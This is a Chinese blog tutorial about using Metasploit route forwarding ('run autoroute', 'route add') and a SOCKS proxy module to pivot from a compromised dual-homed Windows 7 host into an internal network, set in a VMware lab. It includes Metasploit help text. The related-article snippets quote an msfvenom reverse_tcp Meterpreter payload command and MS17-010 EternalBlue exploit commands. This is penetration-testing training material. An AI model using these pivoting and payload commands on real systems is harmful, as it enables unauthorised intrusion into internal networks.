msf路由

最新推荐文章于 2024-02-21 15:17:44 发布
最新推荐文章于 2024-02-21 15:17:44 发布
阅读量3.4k 收藏 3
点赞数
分类专栏: msf 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41741127/article/details/120615908
版权

metasploit设置路由转发

文章目录

0. 试验环境

环境部署在VMWare下,共三台主机,两个网段。

Host-only(192.168.2.0):Kali(攻击机:192.168.2.129)Win7(靶机:192.168.2.128)

NAT(192.168.32.0):Win7(靶机:192.168.32.151)OWASP Linux(靶机:192.168.32.150)

即:一台单网卡Kali,一台双网卡Win7,一台单网卡Linux,Win7与其余两台主机可以通信,其余两台主机之间不能互相通信。Host-only模拟真实外网环境,NAT模拟内网环境。

1. Kali与Win7建立会话

模拟真实环境,使用常规ms17-010漏洞与反弹shell与Win7建立链接,过程不赘述

2. 设置路由转发

2.1 获取目标主机所在网段

获取网段

可以看到,Win7在两个网段中,分别是代表外网的192.168.2.0/24与代表内网的192.168.32.0/24。也可以使用routeipconfig获取相关信息。

2.2 设置路由转发

路由转发

可以在meterpreter中以run autoroute设置,也可以在msf中以route add设置,设置后msf即可正常访问模拟的内网网段,需复制命令请到附录。

3. 注意

  1. msf路由转发是将对一个网段的请求转发到一个meterpreter会话

  2. 该路由转发只对msf工具生效,如果需要对外部程序也生效可以使用msf创建一个代理,如:

    use auxiliary/server/socks_proxy

    在这里插入图片描述

    未配置代理和配置代理对比
    在这里插入图片描述

  3. msf提示run autoroute虽然生效了,但是已弃用,需要使用run post/multi/manage/qutoroute

    好吧,尝试使用了,没有帮助信息,还是原版好使,新版我单方面宣布弃用了。

4. 附录

4.1 run autorouteroute的完整文档

[*] Usage: run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
[*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
[*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
[*] run autoroute -p # Print active routing table
[*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the “route” and “ipconfig” Meterpreter commands to learn about available routes

Usage:
route [add/remove] subnet netmask [comm/sid]
route [add/remove] cidr [comm/sid]
route [get]
route [flush]
route [print]

Subcommands:
add - make a new route
remove - delete a route; ‘del’ is an alias
flush - remove all routes
get - display the route for a given target
print - show all active routes

Examples:
Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
route add 192.168.0.0 255.255.255.0 1
route add 192.168.0.0/24 1

Delete the above route
route remove 192.168.0.0/24 1
route del 192.168.0.0 255.255.255.0 1

Display the route that would be used for the given host or network
255.255.255.0 1

Display the route that would be used for the given host or network
route get 192.168.0.11

枕书人
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2128
红日靶场渗透教程
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6669
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
生命在于学习——MSF初体验(二)
易水哲的博客
10-21 2220
MSF初体验(二)——Meterpreter命令
内网渗透-msf及socks代理转发
baynk的博客
05-29 8954
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
2020-10-17
mekeloove的博客
10-17 171
攻击机:Kali 192.168.109.137 靶机: Metasploitable2 192.168.109.159 内网另一台主机 Windows Server 2012 工具:Metasploit 目标计算机上的漏洞编号为CVE id 2012-1823,完整的名称为PHP-CGI查询字符串参数漏洞,根据PHP主页的信息,当PHP使用基于CGI的设置(如Apache的mod_cgid)时,php-cgi就会收到一个查询字符串参数作为命令行参数(这个命令行参数可以是-s、-d或者-c),它将被
tp路由
timoraty的博客
01-30 107
讲了thinkphp框架中路由的使用
msf命令全集
06-05
* `route`:查看一个会话的路由信息 * `save`:保存动作 * `search`:搜索模块名和描述 * `set`:给一个变量赋值 * `setg`:把一个值赋给全局变量 * `show`:显示所给类型的模块,或所有模块 * `sleep`:在限定的秒...
PHP-MSF 入门教程之服务&路由&应用
11-15
PHP微服务框架即“Micro Service Framework For PHP”,是Camera360社区服务器端团队基于Swoole自主研发现代化的PHP协程服务框架,简称msf或者php-msf,是Swoole的工程级企业应用框架,经受了Camera360亿级用户高...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
例如,`ps` 命令列出目标系统的进程,`sysinfo` 获取系统信息,`route` 查看路由信息,`shell` 打开一个命令行接口,`keylog_start` 和 `keylog_stop` 启动或停止键盘记录。 总的来说,Meterpreter 是渗透测试中不...
基础电子中的MSF业务框架与IMS的关系
11-14
MSF的架构中,业务代理(Service Proxy)扮演了IMS中S-CSCF(Serving-CSCF,服务呼叫会话控制功能)的角色,负责路由和会话控制。应用层业务组件(Application Layer Service Component)相当于IMS中的应用服务器...
论文研究 - 基于OFDM的光网络中多粒度组播流量的弹性资源分配
05-24
本文将RSA问题分解为两个子问题,依次解决基于网络编码的路由分配和基于最大频谱优先(MSF)策略的频谱分配。 进行了仿真实验,以分析所提出的RSA方案的传输性能。 仿真结果表明,所提出的RSA机制可以为多粒度组播...
MSF 下域内渗透
A_991128a的博客
03-15 263
先获取域内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168.2.0/24 //添加动态路由route print //打印路由表。
msf添加路由及socks代理进行内网穿透
最新发布
2301_76227305的博客
02-21 1620
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
MSF路由模块-内网跳跃
weixin_46411728的博客
11-13 132
MSF路由模块-内网跳跃
MSF(六):后渗透
1stPeak's Blog
02-21 5018
后渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...
MSF内网渗透实战
hackzkaq的博客
05-17 3802
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
metasploit进阶
mingyqf的博客
02-28 852
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5594
meterpreter使用攻略(持续更新中)
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2511
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
msf脚本
05-24
MSF(Metasploit Framework)是一个开源的安全漏洞检测和攻击的工具包,它可以帮助安全研究人员和渗透测试人员进行漏洞探测、漏洞利用和后渗透测试等多种操作。MSF中的脚本是一种自动化的攻击工具,可以快速地执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值